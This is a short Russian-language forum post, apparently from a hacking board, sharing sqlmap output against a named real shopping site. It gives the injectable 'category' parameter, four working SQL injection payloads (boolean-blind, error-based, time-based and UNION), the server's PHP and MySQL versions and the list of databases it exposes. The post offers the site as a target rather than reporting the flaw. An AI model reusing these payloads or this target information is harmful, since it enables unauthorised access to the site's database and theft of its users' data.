01.05.2016, 00:12
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
Код:
http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a774b55506a74774f78446271567a747359757950414548467768,0x71706a7171)-- -
---
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0
available databases [3]:[*] dealdb[*] information_schema[*] test
А то все мелочь и мелочь!
 |
|
|